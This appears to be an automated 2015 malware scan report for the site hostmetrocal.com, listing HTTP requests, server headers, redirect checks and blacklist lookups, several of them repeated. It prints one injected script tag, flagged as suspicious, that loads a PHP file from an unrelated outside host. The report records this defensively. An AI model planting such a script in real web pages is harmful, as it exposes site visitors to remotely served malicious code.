Scanned pages/files
Request | Server response | Status |
http://hostmetrocal.com/ | 200 OK Content-Length: 4268 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=13217239"></script> | ||
http://server.iad.liveperson.net/hc/33645339/x.js?cmd=file&file=chatScript3&site=33645339&imageUrl=null | HTTP/1.1 302 Moved Temporarily Date: Sat, 24 Jan 2015 00:17:36 GMT Location: /hcp/html/error_disable.html Server: Microsoft-IIS/6.0 Content-Length: 0 Expires: Wed, 31 Dec 1969 23:59:59 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET | clean |
http://server.iad.liveperson.net/hcp/html/error_disable.html | HTTP/1.1 200 OK Date: Sat, 24 Jan 2015 00:17:36 GMT Accept-Ranges: bytes ETag: "c0cdaeeabe91cc1:36eb" Server: Microsoft-IIS/6.0 Content-Length: 687 Content-Location: http://server.iad.liveperson.net/hcp/html/error_disable.html Content-Type: text/html Last-Modified: Sun, 23 Oct 2011 20:04:05 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET | clean |
http://server.iad.liveperson.net/test404page.js | 500 Server closed connection without sending any data back Content-Length: 117 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hostmetrocal.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 00:17:35 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 4268
Content-Type: text/html
Last-Modified: Thu, 15 Jan 2015 15:26:37 GMT
...4268 bytes of data.
GET / HTTP/1.1
Host: hostmetrocal.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 00:17:35 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 4268
Content-Type: text/html
Last-Modified: Thu, 15 Jan 2015 15:26:37 GMT
...4268 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hostmetrocal.com
Referer: http://www.google.com/search?q=hostmetrocal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hostmetrocal.com
Referer: http://www.google.com/search?q=hostmetrocal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hostmetrocal.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hostmetrocal.com/
Result: hostmetrocal.com is not infected or malware details are not published yet.
Result: hostmetrocal.com is not infected or malware details are not published yet.